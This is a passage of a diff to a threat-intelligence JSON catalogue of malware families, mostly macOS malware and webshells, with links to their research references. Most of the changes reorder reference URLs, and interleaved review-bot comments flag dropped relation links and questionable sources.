+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0821b5c8-db48-4d0e-a969-384dbd74a6c9",
+ "value": "LockBit (OS X)"
+ },
{
"description": "",
"meta": {
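Review bot: the third ref on the new "LockBit (OS X)" entry is Microsoft's Cobalt Strike civil complaint PDF on noticeofpleadings.com, which does not obviously concern a LockBit macOS build; check that Malpedia really lists it for osx.lockbit rather than it having been carried over from another family, and drop it if not. With only a tweet and that PDF as non-Malpedia sources, a one-line description (as was added for EvilQuest and OceanLotus in this change) would help readers judge what the entry covers.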
@@ -8868,15 +9358,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "14f08f6f-7f58-48a8-8469-472244ffb571",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13",
"value": "MacDownloader"
},
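Review bot: MacDownloader loses its `related` block (a `similar` link to dest-uuid 14f08f6f-7f58-48a8-8469-472244ffb571, tagged almost-certain) with no replacement in the hunk. As with the other removed relations in this change, confirm the target still exists and that the link is reconstructed elsewhere before dropping it.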
@@ -8951,9 +9432,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt",
- "https://twitter.com/BitsOfBinary/status/1321488299932983296",
- "https://www.anquanke.com/post/id/223817",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.anquanke.com/post/id/223817",
+ "https://twitter.com/BitsOfBinary/status/1321488299932983296",
"https://twitter.com/BitsOfBinary/status/1337330286787518464"
],
"synonyms": [],
@@ -8967,8 +9448,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes",
- "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
"https://objective-see.com/blog/blog_0x16.html",
+ "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/",
"https://objective-see.com/blog/blog_0x53.html"
],
"synonyms": [],
@@ -8987,34 +9468,25 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4e2f0af2-6d2d-4a49-adc9-fae3745fcb72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405",
"value": "Mughthesec"
},
{
- "description": "",
+ "description": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus",
- "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
- "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html",
- "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/",
"https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/",
- "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/",
"https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/"
+ "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
+ "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
+ "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468",
+ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html"
],
"synonyms": [],
"type": []
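Review bot: two issues in this hunk. First, Mughthesec's `related` block (a `similar` link to dest-uuid 4e2f0af2-6d2d-4a49-adc9-fae3745fcb72) is dropped without explanation, same concern as the other removed relations. Second, the new OceanLotus description cites PcRisk but adds no PcRisk URL to `refs`, and it carries a mid-sentence capital ("According to PcRisk, Research shows") and "MacOS" instead of "macOS"; fix the casing and add the source URL so the attribution is verifiable.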
@@ -9041,10 +9513,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.orat",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
"https://www.sentinelone.com/blog/from-the-front-lines-unsigned-macos-orat-malware-gambles-for-the-win/",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf"
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf"
],
"synonyms": [],
"type": []
@@ -9100,10 +9572,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit",
"http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
- "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
"https://forensicitguy.github.io/analyzing-pirrit-adware-installer/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf"
+ "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf",
+ "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
],
"synonyms": [],
"type": []
@@ -9111,20 +9583,34 @@
"uuid": "b749ff3a-df68-4b38-91f1-649864eae52c",
"value": "Pirrit"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.poolrat",
+ "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
+ "https://www.3cx.com/blog/news/mandiant-security-update2/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bfd9e30e-ddc7-426f-8f77-4d2e1a846541",
+ "value": "POOLRAT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat",
- "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
- "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
- "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
- "https://securelist.com/calisto-trojan-for-macos/86543/",
- "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
"https://objective-see.com/blog/blog_0x1F.html",
- "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
+ "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
+ "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
+ "https://securelist.com/calisto-trojan-for-macos/86543/",
+ "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
+ "https://objective-see.com/blog/blog_0x1D.html",
"https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf",
- "https://objective-see.com/blog/blog_0x1D.html"
+ "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
+ "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/"
],
"synonyms": [
"Calisto"
@@ -9144,15 +9630,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "29e52693-b325-4c14-93de-8f2ff9dca8bf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
"value": "Pwnet"
},
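Review bot: Pwnet's `related` block (a `similar` link to dest-uuid 29e52693-b325-4c14-93de-8f2ff9dca8bf, tagged almost-certain) is removed here with nothing replacing it. This is the sixth such removal in this change; a single sentence in the commit message stating why these relations go away (target entries deleted, or relations now generated from another source) would let reviewers check them all at once instead of per hunk.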
@@ -9162,9 +9639,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe",
"https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/",
+ "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
"https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
- "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/"
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga"
],
"synonyms": [
"Retefe"
@@ -9174,20 +9651,34 @@
"uuid": "80acc956-d418-42e3-bddf-078695a01289",
"value": "Dok"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.rustbucket",
+ "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "03f356e6-296f-4195-bed0-9719a84887db",
+ "value": "RustBucket"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer",
- "https://objective-see.com/blog/blog_0x64.html",
- "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/",
- "https://securelist.com/shlayer-for-macos/95724/",
- "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
- "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities"
+ "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
+ "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://objective-see.com/blog/blog_0x64.html",
+ "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
+ "https://securelist.com/shlayer-for-macos/95724/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/"
],
"synonyms": [],
"type": []
@@ -9200,8 +9691,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow",
- "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf"
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis"
],
"synonyms": [],
"type": []
@@ -9214,10 +9705,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.sysjoker",
- "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/",
+ "https://www.sentinelone.com/blog/sneaky-spies-and-backdoor-rats-sysjoker-and-dazzlespy-malware-target-macos/",
"https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
- "https://www.sentinelone.com/blog/sneaky-spies-and-backdoor-rats-sysjoker-and-dazzlespy-malware-target-macos/"
+ "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
+ "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/"
],
"synonyms": [],
"type": []
@@ -9230,9 +9721,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd",
- "https://securelist.com/windealer-dealing-on-the-side/105946/",
"https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
- "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
+ "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en",
+ "https://securelist.com/windealer-dealing-on-the-side/105946/"
],
"synonyms": [
"Demsty",
@@ -9275,10 +9766,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.update_agent",
- "https://twitter.com/sysopfb/status/1532442456343691273",
+ "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/",
"https://www.jamf.com/blog/updateagent-adapts-again/",
"https://www.esentire.com/blog/updateagent-macos-malware",
- "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/"
+ "https://twitter.com/sysopfb/status/1532442456343691273"
],
"synonyms": [],
"type": []
@@ -9306,8 +9797,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram",
"https://twitter.com/ConfiantIntel/status/1351559054565535745",
- "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/",
- "https://twitter.com/MsftSecIntel/status/1451279679059488773"
+ "https://twitter.com/MsftSecIntel/status/1451279679059488773",
+ "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/"
],
"synonyms": [
"WizardUpdate"
@@ -9336,13 +9827,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail",
- "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf",
- "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
"https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/",
"https://objective-see.com/blog/blog_0x3B.html",
"https://objective-see.com/blog/blog_0x3D.html",
- "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/"
+ "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf",
+ "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/",
+ "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/"
],
"synonyms": [],
"type": []
@@ -9382,9 +9873,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet",
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14",
"http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
- "https://objective-see.com/blog/blog_0x43.html",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14"
+ "https://objective-see.com/blog/blog_0x43.html"
],
"synonyms": [],
"type": []
@@ -9397,10 +9888,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent",
+ "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/",
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf",
"https://twitter.com/PhysicalDrive0/status/845009226388918273",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/"
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [],
"type": []
@@ -9413,14 +9904,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/",
- "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html",
- "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/",
- "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
"https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
- "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"
+ "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
+ "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
+ "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html",
+ "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/",
+ "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/"
],
"synonyms": [],
"type": []
@@ -9433,18 +9924,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader",
- "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
- "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
- "https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://twitter.com/krabsonsecurity/status/1319463908952969216",
- "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
- "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/",
"https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/",
- "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
+ "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
+ "https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/",
+ "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/",
+ "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
"https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption"
+ "https://twitter.com/krabsonsecurity/status/1319463908952969216",
+ "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/"
],
"synonyms": [
"Formbook"
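Review bot: this hunk (and most of the ones below it) is a pure reorder of the `refs` array, not a content change: every URL removed for osx.xloader is re-added in a different position, so the same ten references survive with the set unchanged. That makes real additions elsewhere (for example the new `securelist.com/defttorero-...` reference in the aspxspy hunk) hard to spot in review. Suggest having the Malpedia import sort `refs` deterministically (keeping the `malpedia.caad.fkie.fraunhofer.de/details/...` entry first, then a stable sort of the rest) so that regenerating the cluster only produces diffs where the reference set actually changed.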
@@ -9459,8 +9950,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd",
- "https://objective-see.com/blog/blog_0x16.html",
- "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html"
+ "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html",
+ "https://objective-see.com/blog/blog_0x16.html"
],
"synonyms": [],
"type": []
@@ -9473,8 +9964,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort",
- "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/",
- "https://objective-see.com/blog/blog_0x53.html"
+ "https://objective-see.com/blog/blog_0x53.html",
+ "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/"
],
"synonyms": [],
"type": []
@@ -9487,8 +9978,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru",
- "https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html",
- "https://objective-see.com/blog/blog_0x66.html"
+ "https://objective-see.com/blog/blog_0x66.html",
+ "https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html"
],
"synonyms": [],
"type": []
@@ -9517,9 +10008,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.antak",
- "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx",
+ "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html",
"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html"
+ "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx"
],
"synonyms": [],
"type": []
@@ -9532,8 +10023,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.aspxspy",
+ "https://attack.mitre.org/groups/G0096",
"https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells",
- "https://attack.mitre.org/groups/G0096"
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
],
"synonyms": [],
"type": []
@@ -9546,6 +10038,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.behinder",
+ "https://blog.gigamon.com/2022/09/28/investigating-web-shells/",
+ "https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md",
"https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/"
],
"synonyms": [],
@@ -9574,10 +10068,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode",
- "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf",
"https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf",
+ "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a"
],
"synonyms": [],
"type": []
@@ -9618,11 +10112,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.pas",
+ "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
"https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
- "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
+ "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [],
"type": []
@@ -9635,8 +10129,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/php.prometheus_backdoor",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://blog.group-ib.com/prometheus-tds"
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
],
"synonyms": [],
"type": []
@@ -9704,19 +10198,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
- "https://ironnet.com/blog/chirp-of-the-poisonfrog/",
- "https://nsfocusglobal.com/apt34-event-analysis-report/",
- "https://www.netscout.com/blog/asert/tunneling-under-sands",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/",
"https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
- "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/",
+ "https://ironnet.com/blog/chirp-of-the-poisonfrog/",
+ "https://www.netscout.com/blog/asert/tunneling-under-sands",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/"
+ "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/",
+ "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933",
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/",
+ "https://nsfocusglobal.com/apt34-event-analysis-report/",
+ "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/"
],
"synonyms": [
"Glimpse",
@@ -9732,8 +10226,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200",
- "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/",
